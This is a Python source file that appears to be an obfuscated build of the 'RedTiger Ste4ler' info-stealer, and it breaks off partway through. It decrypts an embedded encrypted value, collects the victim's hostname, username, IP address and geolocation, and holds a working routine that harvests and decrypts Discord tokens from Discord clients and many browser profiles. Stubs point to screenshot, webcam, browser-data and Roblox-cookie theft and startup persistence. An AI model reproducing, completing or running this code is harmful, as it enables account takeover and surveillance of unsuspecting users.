
import sys

def On1y_W1nd0w5():
    if sys.platform.startswith("win"):
        return False
    else:
        return True

try: WNBJZVDUMISFZTGKOPKTZCNMUVZTAIKWPDIATDZXVMMHBDHOJFKSCVMJVIVTLKWAW = On1y_W1nd0w5()
except: WNBJZVDUMISFZTGKOPKTZCNMUVZTAIKWPDIATDZXVMMHBDHOJFKSCVMJVIVTLKWAW = False

if WNBJZVDUMISFZTGKOPKTZCNMUVZTAIKWPDIATDZXVMMHBDHOJFKSCVMJVIVTLKWAW == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import threading
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend
import base64

def B10ck_K3y(): pass
def Unb10ck_K3y(): pass
def B10ck_T45k_M4n4g3r(): pass
def B10ck_M0u53(): pass
def B10ck_W3b5it3(): pass
def St4rtup(): pass
def Sy5t3m_Inf0(): pass
def Op3n_U53r_Pr0fi13_53tting5(): pass
def Scr33n5h0t(): pass
def C4m3r4_C4ptur3(): pass
def Di5c0rd_T0k3n(): pass
def Di5c0rd_inj3c710n(): pass
def Br0w53r_5t341(): pass
def R0b10x_C00ki3(): pass
def F4k3_3rr0r(): pass
def Sp4m_0p3n_Pr0gr4m(): pass
def Sp4m_Cr34t_Fil3(): pass
def Shutd0wn(): pass
def Sp4m_Opti0ns(): pass
def R3st4rt(): pass

def Clear():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def Decrypt(OXWCERNFESZTQUGIRDSDYRHLNWETYLKXDQMBBDQAZQGDZGMFHXQAXRU, v4r_key):
    def DeriveKey(v4r_password, v4r_salt):
        v4r_kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=v4r_salt, iterations=100000, backend=default_backend())
        if isinstance(v4r_password, str):  
            v4r_password = v4r_password.encode()  
        return v4r_kdf.derive(v4r_password)

    OXWCERNFESZTQUGIRDSDYRHLNWETYLKXDQMBBDQAZQGDZGMFHXQAXRU_data = base64.b64decode(OXWCERNFESZTQUGIRDSDYRHLNWETYLKXDQMBBDQAZQGDZGMFHXQAXRU)
    v4r_salt = OXWCERNFESZTQUGIRDSDYRHLNWETYLKXDQMBBDQAZQGDZGMFHXQAXRU_data[:16]
    v4r_iv = OXWCERNFESZTQUGIRDSDYRHLNWETYLKXDQMBBDQAZQGDZGMFHXQAXRU_data[16:32]
    OXWCERNFESZTQUGIRDSDYRHLNWETYLKXDQMBBDQAZQGDZGMFHXQAXRU_data = OXWCERNFESZTQUGIRDSDYRHLNWETYLKXDQMBBDQAZQGDZGMFHXQAXRU_data[32:]
    v4r_derived_key = DeriveKey(v4r_key, v4r_salt)
    v4r_cipher = Cipher(algorithms.AES(v4r_derived_key), modes.CBC(v4r_iv), backend=default_backend())
    v4r_decryptor = v4r_cipher.decryptor()
    v4r_decrypted_data = v4r_decryptor.update(OXWCERNFESZTQUGIRDSDYRHLNWETYLKXDQMBBDQAZQGDZGMFHXQAXRU_data) + v4r_decryptor.finalize()
    v4r_unpadder = padding.PKCS7(128).unpadder()
    v4r_original_data = v4r_unpadder.update(v4r_decrypted_data) + v4r_unpadder.finalize()
    return v4r_original_data.decode()

SJXULGLZFUDBOPYEYJRDGRYLMLBCBOWICVXTTQYSMUXNDZEFUJWQTSPPDNYNUZPUTJWPEYFUWLZAEUJVCY = r"""
PXmr2TUhc58d/3J7q+XS470+9yScEuslKr5I6QGJ3gFhduqOXhwf+72iy01wfvIbjfpQpoNbbdjUZx/yNZtS8togog9UEYURXElUU334Sz2j9vXwFjJEWAkyjR+eEnPyfZGBc3SPWqWcw/aTd1ovjMebNL8h+gaImO6wWwh4PqvcORfUDqFxkNXSPvb7KmI4PCMH4Mkgchj+ECf3IaN2PA==
"""
DZZMDPXNARAMUBXBPOKFXGOXAGPHMARPCKRVLNZKZWSTRFIUXNNWBZCJGJBQQFSQRKYSLTFYGTTFIMSFVTMRLAYSAXCT = "bIUIOpRhXyJoPOsJGyGNJczvVpmqAZQmIbAwyUmtfaswHfQCmFzCyKeHmXLJqywPJFoZUIBDCIEbPkGQFzTjPMyEKOQZOAKPxhMBTUzdRnBdaTumOcPvDuMUDyCCQOYIwJSaDSHizVgRaCHiIo"
GIYMMFRPUHUZPJLVVOMMJQDPBVGDINLNSGQPNHIITVPVVRBFMBPEIMWUDTWEGIKEPLXOKKJDNIM = "redtiger.shop"
DJARBZPPLKHNACJIKLYUIQGBEPXIZFNMWYPTJJFNCCHQWRWOYZUQKUQRMDVYSIYMTPZSRRZNJSWCCBOZITSKFPJTFGJQCJHL = 0xa80505
TEYPBPHKHKJUDZLAEDILSHWEYQLJPZGZPGPVBAEZMKEYJIIKRVHBTVVMHBCKPGTIVUPURLUYGRLPCUZJUKIPROXX = "RedTiger Ste4ler"
EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ = "https://cdn.discordapp.com/attachments/1268900329605300234/1276010081665683497/RedTiger-Logo.png?ex=66cf38be&is=66cde73e&hm=696c53b4791044ca0495d87f92e6d603e8383315d2ebdd385aaccfc6dbf6aa77&"
UWLIHZGZHGQIIEDYZNMPBQXEQLWWMOVMFBXTXGTHTYMHXPMKOIC = "RedTiger Ste4ler - github.com/loxy0dev/RedTiger-Tools"
UMOUHWWWEQHHHAKAEZBDXQDAWDAOWJIVEUEMFVPGJXZTFBLIVKPYFISTFVFXFGQQ = {
        "text": UWLIHZGZHGQIIEDYZNMPBQXEQLWWMOVMFBXTXGTHTYMHXPMKOIC,
        "icon_url": EAWSUCXSYNSQWUIATLEDCNAWMETAPNRNXHGXFOLUJIQQWPKRGYIODLGYJMVACZAFFBLEHCFNIVLCBSQDBMDVCBMQ,
        }
                 
GCDSOKFJMFYDLBMKHEZWPADRROCZDWRDYEAMTOETKBXRQCLWESEIMLJTZGUKPRHOZAEQWZEWAZBM = Decrypt(SJXULGLZFUDBOPYEYJRDGRYLMLBCBOWICVXTTQYSMUXNDZEFUJWQTSPPDNYNUZPUTJWPEYFUWLZAEUJVCY, DZZMDPXNARAMUBXBPOKFXGOXAGPHMARPCKRVLNZKZWSTRFIUXNNWBZCJGJBQQFSQRKYSLTFYGTTFIMSFVTMRLAYSAXCT)

try: CDATQEXBDCRIQBRJTXKBXJQRHFNMARDQDZIYSMDDACPUQYAAAXPLQPETIKYOBKBKFYMZKLLMQNNTXCXAISXFPRNMTATFNPT = socket.gethostname()
except: CDATQEXBDCRIQBRJTXKBXJQRHFNMARDQDZIYSMDDACPUQYAAAXPLQPETIKYOBKBKFYMZKLLMQNNTXCXAISXFPRNMTATFNPT = "None"

try: YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC = os.getlogin()
except: YZTWSGHSWZDJJUTHZWWSEUSJMZEGJUGBFLFVQVRTXMIHHQSIXVDYNERGJXREPC = "None"

try: OYXJFWJGCDUETNCTQTYSAEYHSXNOSQTDDUMVRPKZBBAFYREKGMVAZH = win32api.GetUserNameEx(win32api.NameDisplay)
except: OYXJFWJGCDUETNCTQTYSAEYHSXNOSQTDDUMVRPKZBBAFYREKGMVAZH = "None"

try: KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG = "None"

try: KTVVQABAYDGPDTAKGNUGYBDIUTNYKKMFMZLJLJWPEFMVHSSMISRVTUOKMVOWF = socket.gethostbyname(socket.gethostname())
except: KTVVQABAYDGPDTAKGNUGYBDIUTNYKKMFMZLJLJWPEFMVHSSMISRVTUOKMVOWF = "None"

try:
    CTUALACPNFZEOBDCTRTVEPTLIDVWBQLKSAYJWZDDWYNDGOCXPHOAJLXOTBHXUDQQVFTHBJYAGKHFVJWAQNLACNNTDNM = requests.get(f"https://{GIYMMFRPUHUZPJLVVOMMJQDPBVGDINLNSGQPNHIITVPVVRBFMBPEIMWUDTWEGIKEPLXOKKJDNIM}/api/ip/ip={KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}")
    LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG = CTUALACPNFZEOBDCTRTVEPTLIDVWBQLKSAYJWZDDWYNDGOCXPHOAJLXOTBHXUDQQVFTHBJYAGKHFVJWAQNLACNNTDNM.json()

    BOCSDQSYRYIATZUAMNQSRZGRQCDVMVFPUHZNXVKSFOMLOXJUSKCMOHZWVW = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('country', "None")
    BOCSDQSYRYIATZUAMNQSRZGRQCDVMVFPUHZNXVKSFOMLOXJUSKCMOHZWVW_code = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('country_code', "None")
    PMYLSLIOYTTGSLQACSLRJBUSPDASSNDKBADXOJCZASSJOHIPLIYPPYWAWWFPXBIET = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('region', "None")
    PMYLSLIOYTTGSLQACSLRJBUSPDASSNDKBADXOJCZASSJOHIPLIYPPYWAWWFPXBIET_code = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('region_code', "None")
    NNINVFVRODLYQEAPGXGLDFJHUSWIPXOPLBPBTNKGDPBVKNEQUMTAEAEDPLMNDJWFMKHCQSZQGWTAXFVCJZJERG = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('zip', "None")
    FVRSSNLLARFWRKKGACSMBFQJRPTGHQTJLOWXWCZZYWIWZLSERVSYUWKQZPOSMHKGRCHWCCKSYDZCICJBSLYDPPPPYOB = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('city', "None")
    YCGCHJFRPKQIBPFNBSSFUFJSVONICEIKIZFMHBAAGBRGOXQFEAIEHNHSNZCHIWUKTGIQOBFQPZPPAFLDO = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('latitude', "None")
    FJHKDVXTSOYVEPKYFXBFDZTREFDZOQRCRUHXKHTRPVUEXFRXPJKEMIQCHTWOAAOCXBUVVJQHXJYAMUWFT = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('longitude', "None")
    WCCBMIIENEJLRGGGUEFYWNXGKRRALDEFDBOMAKBQWPLWRTVNYIO = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('timezone', "None")
    EOHWBKERVMCLRSGTQSRKUBIEFZCPHOAOQTLDEQVEVFVNAJSGUTVDJWCSAAAAY = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('isp', "None")
    LNOJZSDJSRCJWDSWCKDOWQKJLKVWZKPABGHIIFQYXQKGSGECWRACIBZZCZWVOMGYGKPWPXVQQVZOGALDEOFPSRMJQJNTVEEUCG = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('org', "None")
    NJEWFSFHWEKTLBYRNCLVVFTCWTSEYQQZNDDRSBPZIWZKLKJUQZQCZUQADPUQJFFTSJQDEOFKYRKYLXX = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('as', "None")
except:
    CTUALACPNFZEOBDCTRTVEPTLIDVWBQLKSAYJWZDDWYNDGOCXPHOAJLXOTBHXUDQQVFTHBJYAGKHFVJWAQNLACNNTDNM = requests.get(f"http://ip-api.com/json/{KKRGVXPPNCZNRJIOVOUKDOJSWTAIEKKCAFAMYMDJOVNBPIRCZLYYGUZTIG}")
    LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG = CTUALACPNFZEOBDCTRTVEPTLIDVWBQLKSAYJWZDDWYNDGOCXPHOAJLXOTBHXUDQQVFTHBJYAGKHFVJWAQNLACNNTDNM.json()

    BOCSDQSYRYIATZUAMNQSRZGRQCDVMVFPUHZNXVKSFOMLOXJUSKCMOHZWVW = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('country', "None")
    BOCSDQSYRYIATZUAMNQSRZGRQCDVMVFPUHZNXVKSFOMLOXJUSKCMOHZWVW_code = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('countryCode', "None")
    PMYLSLIOYTTGSLQACSLRJBUSPDASSNDKBADXOJCZASSJOHIPLIYPPYWAWWFPXBIET = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('regionName', "None")
    PMYLSLIOYTTGSLQACSLRJBUSPDASSNDKBADXOJCZASSJOHIPLIYPPYWAWWFPXBIET_code = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('region', "None")
    NNINVFVRODLYQEAPGXGLDFJHUSWIPXOPLBPBTNKGDPBVKNEQUMTAEAEDPLMNDJWFMKHCQSZQGWTAXFVCJZJERG = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('zip', "None")
    FVRSSNLLARFWRKKGACSMBFQJRPTGHQTJLOWXWCZZYWIWZLSERVSYUWKQZPOSMHKGRCHWCCKSYDZCICJBSLYDPPPPYOB = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('city', "None")
    YCGCHJFRPKQIBPFNBSSFUFJSVONICEIKIZFMHBAAGBRGOXQFEAIEHNHSNZCHIWUKTGIQOBFQPZPPAFLDO = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('lat', "None")
    FJHKDVXTSOYVEPKYFXBFDZTREFDZOQRCRUHXKHTRPVUEXFRXPJKEMIQCHTWOAAOCXBUVVJQHXJYAMUWFT = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('lon', "None")
    WCCBMIIENEJLRGGGUEFYWNXGKRRALDEFDBOMAKBQWPLWRTVNYIO = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('timezone', "None")
    EOHWBKERVMCLRSGTQSRKUBIEFZCPHOAOQTLDEQVEVFVNAJSGUTVDJWCSAAAAY = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('isp', "None")
    LNOJZSDJSRCJWDSWCKDOWQKJLKVWZKPABGHIIFQYXQKGSGECWRACIBZZCZWVOMGYGKPWPXVQQVZOGALDEOFPSRMJQJNTVEEUCG = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('org', "None")
    NJEWFSFHWEKTLBYRNCLVVFTCWTSEYQQZNDDRSBPZIWZKLKJUQZQCZUQADPUQJFFTSJQDEOFKYRKYLXX = LRZWPMMFFVVNLDNAIXAUJDRIGGZDDVXGZCYEXPYLICOYFMOFNTNNAAUBUVKBFDOQG.get('as', "None")

def Di5c0rd_T0k3n():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from Cryptodome.Protocol.KDF import scrypt
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def extr4ct_t0k3n5():
        KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT = "https://discord.com/api/v9/users/@me"
        NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP = os.getenv("localappdata")
        QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ = os.getenv("appdata")
        JJWOZRRMWMSFNVXNJGQZAJFUYLYDSRLFVSTBZKNGBQJTAQISBSK = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        JJWOZRRMWMSFNVXNJGQZAJFUYLYDSRLFVSTBZKNGBQJTAQISBSK_enc = r"dQw4w9WgXcQ:[^\"]*"
        FZCLVNEEIQPOUNIFWITJQREIBEISTQWIAUAGAHLXOTBBFYWJRKTLZNKTDCRAVWKBYTIBAKPRCCCSUUUZQKILKPPAYASTTB = []
        HJFPPCNSSYQCLPHLEFHPZRPNTCIKZSLVONSPKQIJWWTBNFDQYPNZQ = []
        BCIDIKACEMJQICGGBHSZMYFFPQABXDKGGUNRNSSNXNRGKJZEYMNATHK = {}

        QTBPQRQWYLWKLIUFPFCYAGARYNYVHDYTEKYKFRTLTHGEIXPJQRHRYEOOIGBVBAPRLLDHVDBYOMAHGUGSFAZBKWSIYNLUZN = {
            'Discord': QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': NYSJIXTUYFAGBUIKBXBHXUXENCTAOLBAEDBYQSZFSVDCIIWXBPQCOFYDDVBGQPHJCPRWKJJOAXRGLRNGECFTYPKVFBOLBP + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ, DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ in QTBPQRQWYLWKLIUFPFCYAGARYNYVHDYTEKYKFRTLTHGEIXPJQRHRYEOOIGBVBAPRLLDHVDBYOMAHGUGSFAZBKWSIYNLUZN.items():
            if not os.path.exists(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ):
                continue
            DUMMMXCCDECNOFJAGIWVMJMATACFWKGRVHRJTNFZDVZPETHIYJXOVLRJZCNI = OMGOJKIIBWFBOVGYCZLJLYXGRAQYJPKMOEPKGLEMFULNHOHKCRZOJOFRMGUYQ.replace(" ", "").lower()
            if "cord" in DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ:
                if not os.path.exists(QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + f'\\{DUMMMXCCDECNOFJAGIWVMJMATACFWKGRVHRJTNFZDVZPETHIYJXOVLRJZCNI}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{DJOYZGNFORDTMYVDDKJUOPORDQRWBYHJWMHHOUAZGSTTZQGKZTTMBLPBZIUQTCMMPOLXZFJZKESEEFJ}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(JJWOZRRMWMSFNVXNJGQZAJFUYLYDSRLFVSTBZKNGBQJTAQISBSK_enc, v4r_line.strip()):
                                LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD = decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(QJSSZZOKOBTGJLKQHKYZQOBQSDSCUZQPKNIEAPWYUGQALSSWCIDEJKGUQDZVPSNLLVQRJ + f'\\{DUMMMXCCDECNOFJAGIWVMJMATACFWKGRVHRJTNFZDVZPETHIYJXOVLRJZCNI}\\Local State'))
                                if validate_t0k3n(LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD, KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT):
                                    TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE = requests.get(KSHURQPFBROTPBTQSFBWKMBCDSTXSTPNHRLJSPIWODQLWIRDUWSIDGVIT, headers={'Authorization': LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD}).json()['id']
                                    if TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE not in HJFPPCNSSYQCLPHLEFHPZRPNTCIKZSLVONSPKQIJWWTBNFDQYPNZQ:
                                        FZCLVNEEIQPOUNIFWITJQREIBEISTQWIAUAGAHLXOTBBFYWJRKTLZNKTDCRAVWKBYTIBAKPRCCCSUUUZQKILKPPAYASTTB.append(LOQKEYGUSMKEFWAMXXEHJBLGVHVRTFEYLAXCXEDRUZYAPBRTYCOWPWPOAPJXFCOSHWAGINDHGFYIYGLAMZXBJUDPEQSMPZTTWQD)
                                        HJFPPCNSSYQCLPHLEFHPZRPNTCIKZSLVONSPKQIJWWTBNFDQYPNZQ.append(TZBCNWPPVDXFDWEPHVCVNLHRWUVMNRKDSRHGVRNFQAIXJYSVLANTPNHFHCYUPOXIEILEOWHEGRAETHSXSGFHNPURJRCAVODCRJYE)
